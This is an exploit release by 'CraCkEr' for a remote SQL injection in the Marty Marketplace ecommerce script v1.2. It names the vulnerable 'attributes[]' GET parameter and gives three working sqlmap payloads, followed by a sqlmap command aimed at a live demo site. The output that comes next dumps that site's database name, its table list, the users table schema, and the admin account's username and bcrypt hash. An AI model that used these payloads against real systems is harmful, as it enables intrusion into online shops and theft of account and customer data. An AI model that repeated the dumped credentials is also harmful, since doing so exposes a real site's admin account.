Marty Marketplace Multi Vendor Ecommerce Script version 1.2 suffers from a remote SQL injection vulnerability.
de54243b67a1b9382ad0793900de4b162ce93e29eb5cc6a5a7eb97495e63a2b6
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Exploits ] ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr │ │ :
│ Website : sangvish.com │ │ │
│ Vendor : SangVish Technologies │ │ │
│ Software : Marty Marketplace Multi Vendor │ │ Open Source Marketplace PHP script for │
│ Ecommerce Script v1.2 │ │ eCommerce marketplace platforms │
│ Vuln Type: Remote SQL Injection │ │ in the market │
│ Method : GET │ │ │
│ Impact : Database Access │ │ │
│ │ │ │
│────────────────────────────────────────────┘ └─────────────────────────────────────────│
│ B4nks-NET irc.b4nks.tk #unix ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ Typically used for remotely exploitable vulnerabilities that can lead to │
│ system compromise. │
│ │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
Greets:
Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk
loool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear
CryptoJob (Twitter) twitter.com/CryptozJob
Special Greetz to The Lebanese National Basketball Team for the results of
the FIBA Asia Cup
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2022 ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
GET parameter 'attributes[]' is vulnerable
---
Parameter: attributes[] (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: attributes[]=(SELECT (CASE WHEN (6997=6997) THEN 6 ELSE (SELECT 7905 UNION SELECT 6396) END))
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: attributes[]=6 AND GTID_SUBSET(CONCAT(0x717a7a6271,(SELECT (ELT(8162=8162,1))),0x716b6a7071),8162)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: attributes[]=6 AND (SELECT 8488 FROM (SELECT(SLEEP(5)))dSkn)
---
Demo: https://demowpthemes.com/buy2marty/products?attributes%5B%5D=6
[+] Starting the Attack
sqlmap.py -u "https://demowpthemes.com/buy2marty/products?attributes%5B%5D=6" --current-db --batch
[+] fetching current database
[INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.6
[INFO] retrieved: 'garudan_buy2marty'
current database: 'garudan_buy2marty'
[+] fetching tables for database: 'garudan_buy2marty'
Database: garudan_buy2marty
[105 tables]
+----------------------------------------+
| activations |
| ads |
| ads_translations |
| audit_histories |
| categories |
| categories_translations |
| contact_replies |
| contacts |
| dashboard_widget_settings |
| dashboard_widgets |
| ec_brands |
| ec_brands_translations |
| ec_cart |
| ec_currencies |
| ec_customer_addresses |
| ec_customer_password_resets |
| ec_customers |
| ec_discount_customers |
| ec_discount_product_collections |
| ec_discount_products |
| ec_discounts |
| ec_flash_sale_products |
| ec_flash_sales |
| ec_flash_sales_translations |
| ec_grouped_products |
| ec_order_addresses |
| ec_order_histories |
| ec_order_product |
| ec_orders |
| ec_product_attribute_sets |
| ec_product_attribute_sets_translations |
| ec_product_attributes |
| ec_product_attributes_translations |
| ec_product_categories |
| ec_product_categories_translations |
| ec_product_category_product |
| ec_product_collection_products |
| ec_product_collections |
| ec_product_collections_translations |
| ec_product_cross_sale_relations |
| ec_product_label_products |
| ec_product_labels |
| ec_product_labels_translations |
| ec_product_related_relations |
| ec_product_tag_product |
| ec_product_tags |
| ec_product_tags_translations |
| ec_product_up_sale_relations |
| ec_product_variation_items |
| ec_product_variations |
| ec_product_with_attribute |
| ec_product_with_attribute_set |
| ec_products |
| ec_products_translations |
| ec_reviews |
| ec_shipment_histories |
| ec_shipments |
| ec_shipping |
| ec_shipping_rule_items |
| ec_shipping_rules |
| ec_store_locators |
| ec_taxes |
| ec_wish_lists |
| failed_jobs |
| faq_categories |
| faq_categories_translations |
| faqs |
| faqs_translations |
| jobs |
| language_meta |
| languages |
| media_files |
| media_folders |
| media_settings |
| menu_locations |
| menu_nodes |
| menus |
| meta_boxes |
| migrations |
| mp_customer_revenues |
| mp_customer_withdrawals |
| mp_stores |
| mp_vendor_info |
| newsletters |
| pages |
| pages_translations |
| password_resets |
| payments |
| post_categories |
| post_tags |
| posts |
| posts_translations |
| revisions |
| role_users |
| roles |
| settings |
| simple_slider_items |
| simple_sliders |
| slugs |
| tags |
| tags_translations |
| translations |
| user_meta |
| users |
| widgets |
+----------------------------------------+
[+] fetching columns for table 'users' in database 'garudan_buy2marty'
Database: garudan_buy2marty
Table: users
[15 columns]
+-------------------+---------------------+
| Column | Type |
+-------------------+---------------------+
| avatar_id | int(10) unsigned |
| created_at | timestamp |
| email | varchar(191) |
| email_verified_at | timestamp |
| first_name | varchar(191) |
| id | bigint(20) unsigned |
| last_login | timestamp |
| last_name | varchar(191) |
| manage_supers | tinyint(1) |
| password | varchar(191) |
| permissions | text |
| remember_token | varchar(100) |
| super_user | tinyint(1) |
| updated_at | timestamp |
| username | varchar(60) |
+-------------------+---------------------+
[+] fetching entries of column(s) 'id,password,permissions,super_user,username' for table 'users' in database 'garudan_buy2marty'
Database: garudan_buy2marty
Table: users
[1 entry]
+----+----------+--------------------------------------------------------------+------------+-------------+
| id | username | password | super_user | permissions |
+----+----------+--------------------------------------------------------------+------------+-------------+
| 1 | admin | $2y$10$XHYYo3gcYa5sUh62hgASseoSJfQae/w8KOWAW/G6qlHRri6XPRW/2 | 1 | NULL |
+----+----------+--------------------------------------------------------------+------------+-------------+
Possible algorithms: bcrypt $2*$, Blowfish (Unix)
[-] Done